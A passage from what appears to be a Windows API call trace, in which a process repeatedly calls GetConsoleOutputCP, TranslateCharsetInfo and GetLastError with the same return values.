lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.234] GetLastError () returned 0xcb [0160.234] GetConsoleOutputCP () returned 0x1b5 [0160.234] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.234] GetLastError () returned 0xcb [0160.234] GetConsoleOutputCP () returned 0x1b5 [0160.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.235] GetLastError () returned 0xcb [0160.235] GetConsoleOutputCP () returned 0x1b5 [0160.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.235] GetLastError () returned 0xcb [0160.235] GetConsoleOutputCP () returned 0x1b5 [0160.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.235] GetLastError () returned 0xcb [0160.235] GetConsoleOutputCP () returned 0x1b5 [0160.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.235] GetLastError () returned 0xcb [0160.235] GetConsoleOutputCP () returned 0x1b5 [0160.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.235] GetLastError () returned 0xcb [0160.235] GetConsoleOutputCP () returned 0x1b5 [0160.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.235] GetLastError () returned 0xcb [0160.235] GetConsoleOutputCP () returned 0x1b5 [0160.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.235] GetLastError () returned 0xcb [0160.235] GetConsoleOutputCP () returned 0x1b5 [0160.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.236] GetLastError () returned 0xcb [0160.236] GetConsoleOutputCP () returned 0x1b5 [0160.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.236] GetLastError () returned 0xcb [0160.236] GetConsoleOutputCP () returned 0x1b5 [0160.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.236] GetLastError () returned 0xcb [0160.236] GetConsoleOutputCP () returned 0x1b5 [0160.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.236] GetLastError () returned 0xcb [0160.236] GetConsoleOutputCP () returned 0x1b5 [0160.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.236] GetLastError () returned 0xcb [0160.236] GetConsoleOutputCP () returned 0x1b5 [0160.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.236] GetLastError () returned 0xcb [0160.236] GetConsoleOutputCP () returned 0x1b5 [0160.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.237] GetLastError () returned 0xcb [0160.237] GetConsoleOutputCP () returned 0x1b5 [0160.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.237] GetLastError () returned 0xcb [0160.237] GetConsoleOutputCP () returned 0x1b5 [0160.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.237] GetLastError () returned 0xcb [0160.237] GetConsoleOutputCP () returned 0x1b5 [0160.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.237] GetLastError () returned 0xcb [0160.237] GetConsoleOutputCP () returned 0x1b5 [0160.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.237] GetLastError () returned 0xcb [0160.237] GetConsoleOutputCP () returned 0x1b5 [0160.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.237] GetLastError () returned 0xcb [0160.237] GetConsoleOutputCP () returned 0x1b5 [0160.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.237] GetLastError () returned 0xcb [0160.237] GetConsoleOutputCP () returned 0x1b5 [0160.238] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.238] GetLastError () returned 0xcb [0160.238] GetConsoleOutputCP () returned 0x1b5 [0160.238] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.238] GetLastError () returned 0xcb [0160.238] GetConsoleOutputCP () returned 0x1b5 [0160.238] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.238] GetLastError () returned 0xcb [0160.238] GetConsoleOutputCP () returned 0x1b5 [0160.238] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.238] GetLastError () returned 0xcb [0160.238] GetConsoleOutputCP () returned 0x1b5 [0160.238] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.238] GetLastError () returned 0xcb [0160.238] GetConsoleOutputCP () returned 0x1b5 [0160.238] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.238] GetLastError () returned 0xcb [0160.238] GetConsoleOutputCP () returned 0x1b5 [0160.238] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eed0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eed0) returned 0 [0160.238] GetLastError () returned 0xcb [0160.238] GetConsoleOutputCP () returned 0x1b5 [0160.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.239] GetLastError () returned 0xcb [0160.239] GetConsoleOutputCP () returned 0x1b5 [0160.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.239] GetLastError () returned 0xcb [0160.239] GetConsoleOutputCP () returned 0x1b5 [0160.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.239] GetLastError () returned 0xcb [0160.239] GetConsoleOutputCP () returned 0x1b5 [0160.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.239] GetLastError () returned 0xcb [0160.239] GetConsoleOutputCP () returned 0x1b5 [0160.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.239] GetLastError () returned 0xcb [0160.239] GetConsoleOutputCP () returned 0x1b5 [0160.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.239] GetLastError () returned 0xcb [0160.239] GetConsoleOutputCP () returned 0x1b5 [0160.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.239] GetLastError () returned 0xcb [0160.240] GetConsoleOutputCP () returned 0x1b5 [0160.240] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.240] GetLastError () returned 0xcb [0160.240] GetConsoleOutputCP () returned 0x1b5 [0160.240] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.240] GetLastError () returned 0xcb [0160.240] GetConsoleOutputCP () returned 0x1b5 [0160.240] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.240] GetLastError () returned 0xcb [0160.240] GetConsoleOutputCP () returned 0x1b5 [0160.240] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.240] GetLastError () returned 0xcb [0160.240] GetConsoleOutputCP () returned 0x1b5 [0160.240] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.240] GetLastError () returned 0xcb [0160.240] GetConsoleOutputCP () returned 0x1b5 [0160.240] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.240] GetLastError () returned 0xcb [0160.240] GetConsoleOutputCP () returned 0x1b5 [0160.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.241] GetLastError () returned 0xcb [0160.241] GetConsoleOutputCP () returned 0x1b5 [0160.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.241] GetLastError () returned 0xcb [0160.241] GetConsoleOutputCP () returned 0x1b5 [0160.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.241] GetLastError () returned 0xcb [0160.241] GetConsoleOutputCP () returned 0x1b5 [0160.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.241] GetLastError () returned 0xcb [0160.241] GetConsoleOutputCP () returned 0x1b5 [0160.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.241] GetLastError () returned 0xcb [0160.241] GetConsoleOutputCP () returned 0x1b5 [0160.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.241] GetLastError () returned 0xcb [0160.241] GetConsoleOutputCP () returned 0x1b5 [0160.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.241] GetLastError () returned 0xcb [0160.241] GetConsoleOutputCP () returned 0x1b5 [0160.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.242] GetLastError () returned 0xcb [0160.242] GetConsoleOutputCP () returned 0x1b5 [0160.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.242] GetLastError () returned 0xcb [0160.242] GetConsoleOutputCP () returned 0x1b5 [0160.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.242] GetLastError () returned 0xcb [0160.242] GetConsoleOutputCP () returned 0x1b5 [0160.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.242] GetLastError () returned 0xcb [0160.242] GetConsoleOutputCP () returned 0x1b5 [0160.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.242] GetLastError () returned 0xcb [0160.242] GetConsoleOutputCP () returned 0x1b5 [0160.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.242] GetLastError () returned 0xcb [0160.242] GetConsoleOutputCP () returned 0x1b5 [0160.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.243] GetLastError () returned 0xcb [0160.243] GetConsoleOutputCP () returned 0x1b5 [0160.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.243] GetLastError () returned 0xcb [0160.243] GetConsoleOutputCP () returned 0x1b5 [0160.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.243] GetLastError () returned 0xcb [0160.243] GetConsoleOutputCP () returned 0x1b5 [0160.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.243] GetLastError () returned 0xcb [0160.243] GetConsoleOutputCP () returned 0x1b5 [0160.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.243] GetLastError () returned 0xcb [0160.243] GetConsoleOutputCP () returned 0x1b5 [0160.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.243] GetLastError () returned 0xcb [0160.243] GetConsoleOutputCP () returned 0x1b5 [0160.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.243] GetLastError () returned 0xcb [0160.243] GetConsoleOutputCP () returned 0x1b5 [0160.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.244] GetLastError () returned 0xcb [0160.244] GetConsoleOutputCP () returned 0x1b5 [0160.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.244] GetLastError () returned 0xcb [0160.244] GetConsoleOutputCP () returned 0x1b5 [0160.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.244] GetLastError () returned 0xcb [0160.244] GetConsoleOutputCP () returned 0x1b5 [0160.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.244] GetLastError () returned 0xcb [0160.244] GetConsoleOutputCP () returned 0x1b5 [0160.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.244] GetLastError () returned 0xcb [0160.244] GetConsoleOutputCP () returned 0x1b5 [0160.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.244] GetLastError () returned 0xcb [0160.244] GetConsoleOutputCP () returned 0x1b5 [0160.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.245] GetLastError () returned 0xcb [0160.245] GetConsoleOutputCP () returned 0x1b5 [0160.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.245] GetLastError () returned 0xcb [0160.245] GetConsoleOutputCP () returned 0x1b5 [0160.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.245] GetLastError () returned 0xcb [0160.245] GetConsoleOutputCP () returned 0x1b5 [0160.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.245] GetLastError () returned 0xcb [0160.245] GetConsoleOutputCP () returned 0x1b5 [0160.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.245] GetLastError () returned 0xcb [0160.245] GetConsoleOutputCP () returned 0x1b5 [0160.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.245] GetLastError () returned 0xcb [0160.245] GetConsoleOutputCP () returned 0x1b5 [0160.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.246] GetLastError () returned 0xcb [0160.246] GetConsoleOutputCP () returned 0x1b5 [0160.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.246] GetLastError () returned 0xcb [0160.246] GetConsoleOutputCP () returned 0x1b5 [0160.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.246] GetLastError () returned 0xcb [0160.246] GetConsoleOutputCP () returned 0x1b5 [0160.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.246] GetLastError () returned 0xcb [0160.246] GetConsoleOutputCP () returned 0x1b5 [0160.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.246] GetLastError () returned 0xcb [0160.246] GetConsoleOutputCP () returned 0x1b5 [0160.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.246] GetLastError () returned 0xcb [0160.246] GetConsoleOutputCP () returned 0x1b5 [0160.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.247] GetLastError () returned 0xcb [0160.247] GetConsoleOutputCP () returned 0x1b5 [0160.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.247] GetLastError () returned 0xcb [0160.247] GetConsoleOutputCP () returned 0x1b5 [0160.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.247] GetLastError () returned 0xcb [0160.247] GetConsoleOutputCP () returned 0x1b5 [0160.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.247] GetLastError () returned 0xcb [0160.247] GetConsoleOutputCP () returned 0x1b5 [0160.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.247] GetLastError () returned 0xcb [0160.247] GetConsoleOutputCP () returned 0x1b5 [0160.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.247] GetLastError () returned 0xcb [0160.247] GetConsoleOutputCP () returned 0x1b5 [0160.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.248] GetLastError () returned 0xcb [0160.248] GetConsoleOutputCP () returned 0x1b5 [0160.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.248] GetLastError () returned 0xcb [0160.248] GetConsoleOutputCP () returned 0x1b5 [0160.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.248] GetLastError () returned 0xcb [0160.248] GetConsoleOutputCP () returned 0x1b5 [0160.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.248] GetLastError () returned 0xcb [0160.248] GetConsoleOutputCP () returned 0x1b5 [0160.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.248] GetLastError () returned 0xcb [0160.248] GetConsoleOutputCP () returned 0x1b5 [0160.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.248] GetLastError () returned 0xcb [0160.248] GetConsoleOutputCP () returned 0x1b5 [0160.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.249] GetLastError () returned 0xcb [0160.249] GetConsoleOutputCP () returned 0x1b5 [0160.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.249] GetLastError () returned 0xcb [0160.249] GetConsoleOutputCP () returned 0x1b5 [0160.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.249] GetLastError () returned 0xcb [0160.249] GetConsoleOutputCP () returned 0x1b5 [0160.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.249] GetLastError () returned 0xcb [0160.249] GetConsoleOutputCP () returned 0x1b5 [0160.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.249] GetLastError () returned 0xcb [0160.249] GetConsoleOutputCP () returned 0x1b5 [0160.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.249] GetLastError () returned 0xcb [0160.249] GetConsoleOutputCP () returned 0x1b5 [0160.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.249] GetLastError () returned 0xcb [0160.249] GetConsoleOutputCP () returned 0x1b5 [0160.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.250] GetLastError () returned 0xcb [0160.250] GetConsoleOutputCP () returned 0x1b5 [0160.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.250] GetLastError () returned 0xcb [0160.250] GetConsoleOutputCP () returned 0x1b5 [0160.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.250] GetLastError () returned 0xcb [0160.250] GetConsoleOutputCP () returned 0x1b5 [0160.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.250] GetLastError () returned 0xcb [0160.250] GetConsoleOutputCP () returned 0x1b5 [0160.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.250] GetLastError () returned 0xcb [0160.250] GetConsoleOutputCP () returned 0x1b5 [0160.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.250] GetLastError () returned 0xcb [0160.250] GetConsoleOutputCP () returned 0x1b5 [0160.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.251] GetLastError () returned 0xcb [0160.251] GetConsoleOutputCP () returned 0x1b5 [0160.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.251] GetLastError () returned 0xcb [0160.251] GetConsoleOutputCP () returned 0x1b5 [0160.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eeb0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eeb0) returned 0 [0160.251] GetLastError () returned 0xcb [0160.251] GetConsoleOutputCP () returned 0x1b5 [0160.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eed0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eed0) returned 0 [0160.251] GetLastError () returned 0xcb [0160.251] GetConsoleOutputCP () returned 0x1b5 [0160.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eed0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eed0) returned 0 [0160.251] GetLastError () returned 0xcb [0160.251] GetConsoleOutputCP () returned 0x1b5 [0160.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eed0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eed0) returned 0 [0160.252] GetLastError () returned 0xcb [0160.252] GetConsoleOutputCP () returned 0x1b5 [0160.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x601eed0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x601eed0) returned 0 [0160.252] GetLastError () returned 0xcb [0160.252] GetConsoleOutputCP () returned 0x1b5 [0160.252] TranslateCharsetInfo (in: 